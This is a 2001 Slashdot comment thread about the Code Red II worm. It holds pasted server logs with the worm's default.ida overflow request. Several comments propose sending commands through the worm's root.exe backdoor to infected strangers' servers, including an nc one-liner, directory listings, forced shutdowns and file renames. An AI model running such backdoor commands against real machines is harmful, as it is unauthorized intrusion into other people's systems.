Slashdot Mirror
Code Red Back For More
Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different than the original and far more dangerous. CR2 infected servers only attack servers within their Class A address block and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.
Can you either post the source, or a link to the source? I'd like to do the same (I have over 350)
Thanks
In the last ten minutes: /var/www/default.ida
[Sat Aug 4 19:50:18 2001] [error] [client 24.10.20.81] File does not exist: /var/www/default.ida
[Sat Aug 4 19:51:30 2001] [error] [client 24.43.198.115] File does not exist: /var/www/default.ida
[Sat Aug 4 19:58:09 2001] [error] [client 24.102.17.144] File does not exist: /var/www/default.ida
[Sat Aug 4 19:59:18 2001] [error] [client 24.190.160.240] File does not exist: /var/www/default.ida
[Sat Aug 4 19:50:03 2001] [error] [client 24.45.135.139] File does not exist:
This page logs the Code Red attacks (both versions) against an AT&T @Home user. At the time of writing, this server has already been attacked by Code Red II over 440 times!
I just checked my server, which saw very little code red activity. 33 attacks today, way beyond anything I saw before.
Chuq Von Rospach, Internet Gnome = When his IQ reaches 50, he should sell
..it overruns an un-checked buffer to overwrite a privilaged subroutine in memory..
does anybody remember how the cornell finger worm worked?
You just know ISPs like @home are going to start blocking port 80 because of this. Kudos microsoft and some of their users (in all fairness, probably a small minority of them) for recking the web for the rest us.
Click on "Reply to this" just below the story. If you are wanting to submit a story, well... good luck!
political_news.c: warning: comparison is always true due to limited range of data type
route del default
Or however you do it with the NT route command.
set nat enable
set nat entry add [insert outside ip here] 80 10.255.255.200 17000 tcp
write
exit
Or, you could add a filter to deny incoming traffic on port 80.
I already have more hits for codered II than I did for the original.
Does it spread differently / attack more often?
Or is the random number generator better than in the original?
root@beethoven:/usr/local/apache/logs# grep default.ida access_log | wc -l
254
root@beethoven:/usr/local/apache/logs# grep NNNNNNNNNN access_log | wc -l
119
root@beethoven:/usr/local/apache/logs# grep XXXXXXXXXX access_log | wc -l
135
Ahh. Sorry for the mistake. I'm just a linux bum. I can't afford that expensive Windows junk.
Dozings.com -- Its kinda funny... If you're as crazy as me.
Damn, I miss that 'Hacked by Chinese' stuff.. reminds me of sushi.. hmm.. sushi..
Well, at least it was for a "good" cause.. it makes the worm smaller and faster to spread, because the victim doesnt know that hes infected, letting the worm scan more hosts..
A witty saying proves nothing. --Voltaire
th3y 0wnz j000!!@#?!>$@?!$>!-`!?
144 hits for me so far. Good ol' apache...
http://www.genotrance.com/red.html
I can handle a limited number of requests.
I'm running 2.4.2 with no hangs. Cisco made me jump through hoops to get the upgrade.
Anyone from Cisco know why Cisco makes it so hard for customers?
Bush's education improvements were
Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.
Interesting dilemma... how exactly are these people going to get the patches to be installed with the system unplugged? Microsoft is going to have to release a patch CD.
"And like that
One reason that they might have changed to "XXXX" is that the eEye scanner used "X" instead of "N" to gage how affected the internet could be.
That or this puppy has been around for longer than we think
I felt I was missing the fun... so I decided to open up a port on my firewall and check for some attack attempts...
/var/log/apache/access_log came up with:
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281
It took only ten minutes before
213.123.150.110 - - [05/Aug/2001:14:12:16 +0100] "GET
Blimey... 10 minutes! This thing is rife!!!
And yes that machine is in the same class B network as myself. His ping time latency is over 500ms though... (that was at the time of the scan. Normal latency is around 20-50ms).
I've been thinking about this.. We ran a very tight routing configuration at my last job (not vouching for the software).. using PIX we severely locked down inbound traffic flow, but had to manage inbound email and Websphere access to mainframe databases.
I wonder about much smaller organizations that might dual-home an NT box with 192.168 on one side and their registered address on the other. Granted, a Linksys would go a long way, but I'm sure many of these tiny firms don't have someone to go to for little tidbits like that.
I almost feel bad for those entities. You would think a small business may not be able to pay extravagant fees for software, but instead of going with free software (which is certainly more difficult to configure) they instead choose to pirate the shoddy MS garbageware. Now they're suffering greatly as a direct result of the choices they made.
The way I see it, though, is kinda like feeling bad for West Virignians who rebuild their homes in the same place after last one was washed away by a flood. I just can't feel bad for their own stupidity.
Intelligent Life on Earth
There are just too many IIS installations that are run by people who either don't know what they are doing or worse don't even know what IIS or a web server is. That's the problem with these "idiot-proof" GUI webservers...they can be run by idiots.
It certainly dosn't help that it can take more effort to not install IIS.
arp broadcasts of routers trying to figure out who the f*ck the machine that code red 2 is trying to probe is. if the server doesn't exist, it's broadcasting to your subnet to find out who that IP belongs to..
Naaa... just config your firewall to DENY connections from authorized-scan1.security.home.net (24.0.0.203)
Keeps those pests at bay...
How many hosts will the new strain scan, and does it re-seed its RNG? The reason I ask is that I've noticed that many of the infected hosts that are within my same subnet have scanned my machine upwards of 5-6 times today...
Is each host just limited to a finite number of IPs that it will scan repeatedly, or will it continue to scan the entire Internet if not stopped?
Dont expect every scan to be from an infected computer.. Since CR2 "r00tz" the computer, it might be some skript kiddie trying to get in your computer.. That means that the CR2 worm is worst because it also uses the "evil" and greed in us to cause more trouble to the internet.. So, the idea of running a script that goes through the logs isnt that good..
Anyone with a Cisco Smartnet contract should be able to download the 2.4.2 image for the 67x series. It's up there on the CCO. If your ISP doesn't have a contract you should suggest that they get one if they are going to continue to support Cisco products. If they use Cisco routers and/or switches they may already have one. Try asking.
I've gone and hit the addresses showing up in my logs and I haven't seen the tell-tale 'Hacked by Chinese' message. Seems like the new Code Red also leaves the default site at the IP address alone, making it less obvious that a server is infected. Joy.
Some people have a way with words, and some people, um, thingy.
COMPANYX is infected and scanning. I got several hits from them today..so i hit their website to see who it was. Here's snippet of their propaganda. Go Figure. DARPA (Defense Advanced Research Projects Agency) has recently awarded COMPANYX a contract to develop technology to help the US military effectively respond to strategic threats to the computer networks of the United States government. In particular, COMPANYX will develop tools that can be used to plan courses of action that can counter the threat of widespread, adaptive, coordinated and rapid attacks by exploiting predictive cyberspace knowledge to effectively manipulate the future actions of attackers to the benefit of US cyber defense.
Kangaroo Koncepts
Milo from Kangaroo Koncepts
My first hit from the 'N' variety was :
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 330 "-" "-"
evrtwa1-ar9-4-60-251-194.vz.dsl.gtei.net
4.60.251.194 - - [04/Aug/2001:06:26:29 -0700] "GET
This was at 6:26AM Pacific time. I hope this helps track the bastard...
Michael A. Uman
Sr Software Engineer
softwaremagic.net
That 1 is probably the one that infected you.
The really scary thing is to consider how long CodeRed V2.0 would have gone unnoticed if the probes would have stuck with the "NNNN" series instead of the "XXXX" as the overflow fodder? It took me two cups of coffee this morning (well, ten-ish) to see that I was looking at a page of "X"s. Could it have gone relatively stealthy?
one better than mcleodeight
date = Sun Aug 5 11:42:52 CDT 2001
/default.ida?XXXXXXXXXXXXXXXXX snip /default.ida?XXXXXXXXXXXXXXXX snip
Linux running apache. The first sign of the XXXX version showed up yesterday:
61.77.78.28 - - [04/Aug/2001:14:01:22 -0500] "GET
211.36.128.3 - - [04/Aug/2001:23:44:01 -0500] "GET
Wouldn't you know it? nslookup returns non-existant host/domain. Otherwise, we are still getting probed by the NNNN variety about once an hour.
To-do List: Receive telemarketing call during a tornado warning. Check.
I can't believe we haven't /.ed his guestbook!! I was expecting to find about 400 entries saying, "you do realize the entire Internet knows you're a complete moron by now, don't you??"
Intelligent Life on Earth
Essential unix sysadmin text: http://www.admin.com/
"Personal Web Server" on Windows 9x is just a varient of IIS and is probably vulnerable to most IIS bugs. It gets a pass on this one because Index Server is not installed on 9x.
>
> SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be succeptable to cracks and attacks that are easily preventable.
For his track record of trading security for market share, I'm just as happy as any Slashdotter to see Bill Gates' nuts roasted over a fire until they pop.
But the fact is, your PC - whether it runs CP/M, BeOS, FreeBSD, Linux, or Windows XP - is fundamentally different from embedded systems like your microwave and your car.
Design flaws can exist - in medicines, in consumer products, in closed-source applications, and yes, in open-source applications.
The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.
The reason it's "allowed" to crash is the same reason automobiles are "allowed" to crash -- sometimes it's a design flaw (Code Red IIS exploit, BIND exploit, Ford Pinto gas tank that exploded on rear impact), and sometimes it's operator error (SirCam worm, drunk driver).
> I hope no one keeps personal, private, confidential and financial data on there pc's.
The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench. Ya gotta do what ya gotta do.
What you could do though, is set up a RunOnce entry in the registry to start Notepad. Then, when the user next logs on, they'll get the message!
Of course, once they reboot, they are no longer infected, but maybe they will patch it.
Yeah.. anyone who is on the computer on the weekends who would be able to do such a thing is a geek, and most geeks would rather see the shit hit the fan than fix it :)
(I know that I'm a little excited to see this happening)
I can't believe people trust their businesses to this crap. That's just too funny.
War is necrophilia.
Absolutely. Never forget that all observed phenomena have direct causal relationships. The one you find the most offensive is always to blame.
Another weird thing the worm did was mess with the weather in Bethesda, MD today. It was hot and sunny around 4:30pm, yet there was a torrential downpour. The sun never went away. Damn worm.
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
No, I don't think I did.
You are right, a well set up unix box takes little time to administer if you leave it static. That is the point. What if your client decided they needed to find a distributed FAX server for their office. Its dead simple to find this stuff and install it and thats what they are looking at. They can call me in for my $75 an hour and end up paying far more in the 3 hours I'm there, and the 5 hours I took to research this stuff...not including fielding the service calls when their secretary needs trained how to use it...than if they would have had the secretary use some of her downtime to do a search for FAX SERVER and WINDOWS NT and find something that worked reasonably well. One of the more technical folks in the office slaps in the card, installs the software and then they call me to come in and do a tweek here or there or ask me if the software looked good in the first place.
The fact is computers don't need to be 99.999 for most businesses. I DO know what you mean though: My biz partner whom handles most of the creative aspects of the biz, didn't even know that 3 of our boxes we had sitting in our racks were Unix based. All he knew was that these were the machines that he never had to touch. He knows all about Windows as he's had to futz with them all the time. Give him unix and he'd be lost...even if ya threw him into KDE or Gnome (two things you'd never see on any of my servers).
Again, admining a Unix box CAN be cheaper and takes less time, but when I get around to an office once a month, that ain't going to cut it when then need new users added to the system and mail accounts set up...how about a new CGI installed for the webserver...that sorta stuff. Having a geek on call would be perfect, but the cost of a fulltime windows person is still going to be far cheaper than a part time unix person that knows what they are doing.
I'm still doubting if I will run something like this on my machines:
/var/log/httpd/access_log|gawk '/default.ida/ {system("echo GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0|nc "$1" 80")}'
tail -f
In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.
Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...
This root.exe might be a stepup for causing even more problems at a later time!
Argh, that poses a bit of a moral dilemma for me...
When the first Code Red worm comed out, the press gived it so much attention and so little details, that almost every non-geek person was scared and decided to not come to the Internet on the 1st of this month.. So, in that day, at least for me, NET WAS FASTER!!! yay!!!
My point is, if the press gives as little details about the Code Red II as it did to "The One", net will be faster for some people (as long it DECENTLY attacks the White House homepage)!
Anyways, I was already expecting a CR2 (and expect a CR3, 4, etc.. it will be like Final Fantasy, eh =), but expected it to exploit different vulnerabilities (thats why I think CR2 wasnt made by the same author as the CR1)..
CR WILL be the new worm model that "evil little green (wo)men" (thats what the government wants to believe they are..) will follow.. Imagine that, mass defacement made easy..
Also, just imagine the damage if 4 or 5 of these worms went lose AT THE SAME TIME, exploiting vulnerabilities in many OS (that way, "evil little green (wo)men" wouldnt had to build one HUGE worm, just tiny ones that "0wn3d" different SOs/webservers and caused total anarchy for everyone).. Imagine that.. Total chaos..
If a woodchucker could chuck wood, and if it would, how much wood would a woodchucker chuck if he could chuck wood? -- Monkey Island 2
Nope I work with this damn fool and I can verify what happened.
When the lil'kitty-cat-man's main boxen, dual-p3, crashed he moved to a backup system a p2-233 and installed win2k, he runs a nice little site that no one wants to have \.ed and apparently either someone complained, he was using too much bandwidth or @home really did notice, this may have been too early but what if this was RedII and it made an attempt on an @home server, DHCP, DNS, etc??
But in anycase, he calls @home, they say you running services, bad, you have virus code red, bad, fix and we let you back on, good.
Reboot, shut off IIS, call back, they say must call back during business hours to get reactivated, wait without access for way too long and then call, everything cool.
net send administrator "Your web server is compromised..."
That should pop a message up to a console the admin has logged on to, if the messenger service is running and if they're using the Administrator account (which is likely, they have unpatched IIS boxes hanging out there, eh?).
A more drastic approach would be to spam all workstations with the same command, but I will leave that as an exercise to the reader.
I've seen 344 total now, as of midnight MST.
About 1/3 of those are from the original code red... the "NNN" sequence.
Over 2/3 of them are from Code Red 2, the "XXX" sequence!!
That means that in just one day, i've got over twice as many code red 2's as I have code reds total.
After this whole mess anyone still running IIS is just a fscking moron.
Errrr.... More things named in my honor... This can't be good!
:-P
If worms start popping up with Linux4Green (my ICQ nick) then I know I'm bad luck.
--
CodeRed, the lower user #. No relation to SirCam.
It doesn't affect its own netspace exclusively. Initial analysis indicates that it will do so 6 out of 7 times. The 1 out of 7 will go outside its network range.
We'll have full details posted to the Incidents list shortly.
We're still talking about an IIS4/5/PWS vulnerability that just defaces the default web page and trys to propagate itself, right?
-EvilMagnus
OMG.. I just found "Fux_Israel.html" on the root dir of one of the infected hosts.. After opening it, it contained just a blank page.. something tells me that there are numerous defacers using the backdoor to "fuxoring" with the system and installing new backdoors on them.. This CR2 is *really* worst than the first.. Just imagine CR3.. Looks like that from now on things will be worst for us (at least the outlook virus will most likely die).. I just dont want to imagine what would happen if numerous worms destructive as this one, but exploiting different vulnerabilities in different webservers would do.. who knows.. probably that would *really* bring down the internet..
If they checked their logs, they'd see upwards of 300 infections daily anyway. At that point, its difficult for them NOT to be aware of the worm.
More likely is that a lot of the machines are unattended, and/or their users are unaware of even HAVING IIS.
Paranoid
Bwaahahahahaa.
Under "services," they list "firewalls."
Awesome.
A log of attack attempts here over the last 3 days can be found here
The patterns of frequency and source IPs speak for themselves. Interesting to note that I'm continuing to be attacked by both versions of the virus.
Thanks to Apache, they don't achieve anything, but the waste of bandwidth is stupid and annoying.
I'm thinking of getting in touch with doubleclick to negotiate advertising and make some money since my site is suddenly so popular.
give me a
Well I was thinking more along the lines of.
/Y mayhem but whatever floats your boat. The last thing I'd want to do would be actually fix the idiots system.
Industrial espionage, identity theft, blackmail, and general deltree
War is necrophilia.
I tried to visit some of the infected sites in my web log, but most of them gave no response, until I got to http://202.81.246.51 which states: "If you can see this, it means that the installation of the Apache web server software on this system was successful." :)
Actually, root.exe is just a copy of cmd.exe, as can be seeing by running a dir on c:\winnt\system32\cmd.exe. The different sizes of cmd.exe probably just mean that this is a slightly different version (service pack) of windows, that's all.
Kiddies wouldn't bother with the IIS exploit, though, it's already been done for them. They would go straight for /scripts/root.exe. So if you just hit every host that sends the default.ida vulnerability, it's a pretty safe bet they're all compromised.
If I'm getting this right, if you just get root.exe all you'll get is a prompt that you can't do anything with. Try doing a get with arguments, like "GET /scripts/root.exe?dir".
In my area, @home can't tell what's out. It takes many hours for an outage to make it onto "the board." If you call before this time, they will make you reboot the computer, reset the modem, etc etc. and then they will schedule a tech to come out. Because, again, let me repeat myself: they have no ability to monitor the network in real-time. I am comvinced that "the board" only shows outage data that they collect from outraged customers.
(side note: the idiot techs always make you reboot... even though the modem's ability to sync to the network has NOTHING TO DO with the kind of computer it is attached to, or even indeed if the computer is ON or OFF. Sigh.)
@home is a freaking circus. A monkey house.
I actually prefer it that way, they are apparently too dense to notice all the servers I run in violation of the TOS.
My machine has received over 250 hits in the last few hours. I have tried to telnet to them (prot 25) but most are connection refused. Which port are you supposed to telnet to, and what do you say?
Is there a "shutdown -h now" equivalent with windows?
Should read: Several @Home users reported that everything was moving along normaly. Most of thier friends giggled and left the room.
one better than mcleodeight
No pop up hell here. But then I have forsaken Java and Javascript. Life is good.
AND he lives on APACHE BLVD!!! now if that's not ironic, smack me.
"Give a man a fire and he's warm for a day, but set fire to him and he's warm for the rest of his life." Terry Pratchet
The reason is that rootkit will be running as a child process of a service, and services are not normally allowed access to the user desktop.
If the IIS W3svc service has been set up to use the LocalSystem account, it is possible to check the "Allow Service to interact with Desktop", but you have to deliberately do this. And it is impossible to grant the LocalSystem account anything more than pleb rights, so almost nobody uses this option. The IUSR_ account is what a default IIS box is configured to use.
What you could do though, is set up a RunOnce entry in the registry to start Notepad. Then, when the user next logs on, they'll get the message!
http://www.netcraft.com/survey/
.Net site spotted
.Net services. This is earlier than many people expected, however the site www.empowered.com is a Microsoft Gold Certified Partner and Microsoft itself has several sites using .Net, including uddi.microsoft.com.
.Net Server becoming quite widely deployed
.Net Server, the operating system that will succeed Windows 2000 sometime next year. Windows .Net Server has had little media attention relative to .Net, and there has been no prior reporting of the availability of a pre release, but the sites running the Windows .Net pre-release are spread over several countries.
Around the Net
Microsoft gains around five and a half per cent of web hosts this month, and almost 2% of active sites. Primarily this is a result of two large US installations converting from Solaris.
The large free hosting company Namezero, hosted on the Exodus network, has migrated its front end systems to Windows 2000, as has part of the Network Solutions domain registration system. Network Solutions has moved physically from Digex, to Interland, [where Microsoft held a minority interest, prior to the sale to Micron] as part of the process.
These large installations had previously been masking a general decline in Solaris share on the web, which is now down four percentage points over the last year. Additionally, the Network Solutions site was by far the largest Netscape-Enterprise installation in terms of numbers of hostnames, and one would expect that Netscape-Enterprise overall share will drop towards the 2-2.5% it has in the active sites analysis over the next few months.
First
This months survey also found a site outside of microsoft.com offering Microsoft's
pre release of Windows
There are already between six and seven hundred sites running Microsoft-IIS/6.0 and Windows
Sigged!
Well, it isn't that unlikely that the people that were responsible for these servers were simply fired during the dot-bomb fallout and the people left didn't know or care anything about them and leave them running unattended. I think this is just another reason why you cannot churn out moronic MCSEs into the industry to replace experienced system administrators. Anybody caught dead using IIS after the last 20 root exploits really needs to have their head examined.
25 - 30 per hour here on 24.x.x.x and same on 216.x.x.x.x.
one better than mcleodeight
Mine are all coming in from 65.10.x.x
What the fuck? What the fuck is going on? How the fuck is it that I can have old ladies calling me up at work (tech support for an ISP) and asking if the reason they can't pick up their email is because of the Code Red worm, 'cos they saw the press conference and, hey, they're wondering, and something like 105,000 separate IP addresses are still infected? Did the rapture happen when I wasn't looking, and God took the people responsible for these computers, those left behind couldn't find the passwords anywhere? How is this possible?
(I know, I know; not everyone lives w/in viewing distance of CNN, default installations of MS whatever -- but still, this absolutely amazes me.)
Carousel is a lie!
Comment removed based on user account deletion
I'm on a /128 cox at home subnet. It's normally very quiet on my subnet, but since this morning it's my firewall has been bouncing packets like crazy.
I'm guess I'm going to have to put a packet sniffer on the other side of the wall and see what the hell is going on with this code red II.
233 attempts so far.
The ONLY thing that @HOME, or at least AT&T@HOME, scans for is the usage of news servers, and I think that is the least of their concerns. I'm sure they won't change their policy (and I hope they don't since I run many other servers off my @HOME connection). It's not the ISP's problem to monitor the usage of their clients unless it results in a bandwidth problem for them, or a legal problem for them providing a client the bandwidth (to use illegally). This still boils down to stupid users, stupid people. I've had over 20 times the amount of hits from this codered II worm then the first codered one last month. It's modified to attack cable modem users specifically, I'd assume, and rightfully so. Maybe it will shed light on the problems with installing microCrap(tm) products.
http://www.codewolf.com - Just good stuff to waste time
...Pick any one.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
ITYM rh 6.2
wget http://64.131.175.145/mp3/index.html
:-)
Probably best to view index.html in a text editor though.
There are 1.1... kinds of people.
According to section 1343.4(d) of the DMCA, I quote: "...an entity may initiate a lawsuit regarding something in CyberSpace: The _Dangerous_ Internet, only if said entity has a net worth of over $500million, is on the list of Government Approved Plaintiffs, they're suing so they can "protect our children from pR0n and h4X0rz", and has brib^H^H^H^H contributed at least $4million to congressional and presidential campaigns during the last two election cycles..." and so forth and so on. You may be SOL unless you work for something on the approved list like the RIAA or MPAA. Sorry :(
Best. Comment. Ever. Enjoy!
Easy. Make it so it isn't a true "worm".
Make it so it patches against the exploit, then routes all attempted re-exploitation to a small CGI that uses the backdoor to disinfect the attacking system, and install the countermeasure.
So...assuming you're getting hit with 30 requests an hour from 30 different IPs -- and each of those 30 is getting hit the same way -- the "fix" could propagate itself like wildfire, without being an "active" worm (seeking out hosts to disinfect), but instead being a "passive" worm (waiting for an infected computer to contact it, then disinfecting that computer, and passing on the "passive" disinfector).
Problem being, it's still modifying the data on someone else's computer, without their knowledge or permission. I believe that makes it illegal -- even if it is working for "good" rather than for "evil".
Actually, the three variants of the initial worms (1 with broken random number generator, 2 with a fixed one) can be considered roughly the same release. Indeed, apart from the obvious fixes, most code was rigourously identical. So, let's call those 1.0, 1.1 and 1.2. However this one is entirely different, apart from the exploit it uses, and the name CodeRedII. Thus the use of version 2.0 does seem to be justfied.
c178.h203149139.is.net.tw - - [06/Aug/2001:00:22:44 +0930] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9 090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u000 0%u00=a HTTP/1.1" 400 - "-"
No more "GET", notice.
Now what does this one do?
I found something very very similar to this on another server. It was the index.htm file, not a seperate one.
Duh. I never said it was a Class A. A class A network has a 0 as the MSB, and a class B has a one. 128.x.x.x is 10000000.x.x.x in binary. However, the article mentioned that the worm stuck either within its own class A or its own class B, and I was merely commenting on the sitution in my own slice of class B heaven.
We don't have a state-run media we have a media-run state.
Holy shit.
In the root directory of the drive there's an HTML file with the "Fuck USA goverment" tag or whatever. I am not doing anymore snooping.
The shit has hit the fan, ladies and gents.
--
Like someone said elsewhere, the best (and only I think) way to partially fix this problem is to write a variant of the worm (Code Green? :)) that fixes all the servers before it gets out of hand.
I bet if this was an apache/Linux bug that variant would be out already. Seriously.
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
Maybe you should subscribe to the MS Product Security Notification mailing list.
No wonder my dsl is so slow tonight! :)
Winter 2010: With Glowing Hearts
- IBM Instructor -- "Introduction to System/360," circa 2Q 1966
Yeah, it's much harder to install Apache. You have to remember how to type "apt-get install apache". Fortunately the Debian people tend to stay pretty well ahead of the security issues, so if you apt-get update ; apt-get upgrade on a regular basis, any newly discovered vulnerabilities will get fixed. Not that Apache's had any major vulnerabilities in a long, long time. Maybe the solution would be to port apt to Windows...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
I'll try to take this one...
/dev/null. That way, the request will actually come into my firewall (and go directly to /dev/null) so that snort will be able to watch that data as it comes in.
Snort has to inspect traffic as its coming in. If a machine on your subnet doesn't have port 80 open, then the initial connection will be refused.. therefore the GET request will never be sent, and snort cannot log the attempt.
Snort isn't going to report ALL connection attempts to port 80 on your subnet, only CodeRed infection attempts, which can ONLY occur after a connection to port 80 was successfully made.. get it?
I opened port 80 on my firewall, but used xinetd to route all incoming connections to netcat, a program that just routes all incoming data to
CodeRed can't send the infection attempt until it connects to port 80. Clear enough for you?
Intelligent Life on Earth
DAMIT! that JUST added that, i swear!
this is my sig.
Also, once reinfected (by whatever means), I would presume that the rename would fail.
Renaming c:\explorer.exe should help.
- Sam Ruby
Check out this heise.de article (in German, sorry)!!! Somebody apparently programmed a little Linux tool that may be able to slow the spread of the worm down a little. The idea was first introduced in the incidents.org forum. May be worth a look.
"rundll.exe user.exe,ExitWindows", dont forget to do a echo "I have shut you down you were spreading coderedII" > c:\\whyIshutYOUdown.txt
They're not doing a very good job of it, because about 30% of the code red hits on my server today are from @home addresses.
Edward Burr
Having a smoking section in a restaurant is like having a peeing section in a swimming pool.
Zolof is considered to be the cause of Phill Hartman's wife's death rampage, and the school shootings in Colorado and Atlanta. Watch TV for the commercials for a maddening hell where you want to kill those around you.
Checking my web logs, I only see 4 Code Red IIs. Of course, I'm swamped with Code Red the First attacks. Thankfully, running Apache, all my servers do is say "huh?" and log it. Linux condoms are great for stopping Microsoft transmitted diseases.
We don't have a state-run media we have a media-run state.
Damn. I knew I should have went with Geico!
just strokin'
After reading the post. I installed ZoneAlarm just for fun on the win2k box here at home (no IIS is not installed :)). In the last 30 minutes I have had 20 hits to port 80, all of them web sites. When checked on Netcraft all were IIS/NT sites. My guess is its Code Red II. Most hits coming from my Subnet 203.79.xxx.xxx, hidden down here in lill old New Zealand. Most of the sites are in an unreadable Asian language. So I'm guessing Asia shares part of the subnet that my ISP uses.
Be interesting to see whats in the news tomorrow morning when I get to work. *gets all excited*
Someone should tell all those idiots out there who pirate Windows 2000 that they should pirate "Windows 2000 Workstation" and not "Windows 2000 Server" because they're all going to get themselves own3d that way.
Even Slashdot wants to hide some things
Yikes... their opening sentence does not bode well for the technical content in the rest of the article...
"IT WAS NOT IMMEDIATELY clear if the new worm was a variant of Code Red or just a nastier copycat..."
Mmmkay...
"And like that
might I suggest doing root.exe last? you dont wanna close yout hole for fixing the stuff :)
I've got about 5000 hits for both versions combined since yesterday morning on the 10 virtual sites on my box. Sheesh. This is bad (for IIS users that is).
Female Prison Rape in NY
Might not remove the worm, but at least gets the "admin" (ha) to pay some attention. Maybe make a request for YOU_HAVE_THE_CODE_RED_WORM_YOU_MORON.HTML right before you do it in case they check the logs :)
Interesting.
Also...
Some states/jurisdictions do not allow the exclusion or limitation of incidental or consequential damages, so the above limitation or exclusion may not apply to you.
Does this really mean anything? Could somebody in some state conceivably sue them successfully? The rest of the EULA is an absolute, complete, iron-clad denial of any liability whatsoever. This last sentence is the only shred of hope I could find.
OTOH, be careful what you wish for. The GPL has similar disclaimers...
It just occurred to me to look up the definition of Class A/B/C addresses, and yup, I used the terms wrong in my story submission (argh!). What I meant to say was that when the worm generates addresses to scan, it appeared to always keep the first octet and a little over half the time (137 of 224 scans in my case) it keeps the second octet as well. That's no longer precisely true: I've since logged one scan from 152.72.x.x (grep XXXX access_log | grep -v 24.). And the high number of scans from within the first two octets may have more to do with that being a block of cable modem addresses rich in vulnerable IIS machines than anything else.
And now we know these poor bastards have been rootkitted. There has to be a way to use this to warn them?
just complain to cisco how your vender is out of business so cannot supply it and you expect them to supply it to you for free or you will be calling the better business bureau and they will cough it up... worked for me!
Isn't the default a 'workstation' install which doesn't install Apache? Also, there's now a firewall enable by default, you would have to open port 80 to let anybody connect.
@ home doesn't even use IIS. It's the users! People are getting this on DSL TOO!
ARPs are fun. I'm getting about 50,000 of them...
As long as they don't change that to the worth of their software, or $5 US, wichever is more.
--I assume full responsibility for my actions, except the ones that are someone else's fault.
Unlike a car that explodes to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.
Aren't you the Wipo Troll?
Karma whore!
The biggest problem here is the behavior that microsoft incourages.
The encourage both ease and laziness. They go after the users that will use the default setting and they make there software very easy to use, be requiring little or no grasp on the concepts being applied.
There are lots of linux distros who are also encouraging laziness.
Now this is all fine and good as long as these companies take the responsibilty to make there software secure. If the are expecting users who do not know what they are doing how can they every expect them to path there software
These morons, by not patching their systems, are broadcasting their own termination notices.
We all know it won't be as entertaining as the first one...
-
hadmacker x & Aurel
Disagree. Apache doesn't answer requests as root, and the apache user (usually nobody, apache or httpd) can't write anywhere useful. IIS answers requests as the kernel. ACLs? What ACLs? Banzaaai!
I also routinely mount
There's also the issue of change and diversity. For example, older Apaches tend to default to
Mandrake installed in a server configuration does start a web server (and other things), but it specifically tells you about it during installation, and you have to click [Yes] to make it happen. They also do things like starting with ALL:ALL:DENY in hosts.deny, meaning that even with services running, a crackers' hope is likely end in futility. Many packagers are following suit.
Debian's automatic updates also take the dodo-or-busy sysadmin out of the loop. Mandrake, RedHat and others are following suit.
Summary: no, we wouldn't. Even though there are twice as many Apache sites as IIS. OTOH if M$ also had 95% penetration of the web server market, the Internet as we know it would be history by now.
Got time? Spend some of it coding or testing
where are my mod points when i need them??
...and I want to know if I'll get spanked for sending my log (367 entries and growing quite quickly) of these default.ida? requests to abuse@microsoft.com ;-)
I thought that had been well documented...
:)
:)
Even though your webmin feature has been turned off, your cisco is still accepting connections, and it still parses the default.ida?XXXXblah, and that firmware crashes when it tries to parse a ? in a URL... There's updated firmware for that device available... Go get it.
I can't say where, I haven't got one.
The two most common things in the Universe are dark matter and stupidity.
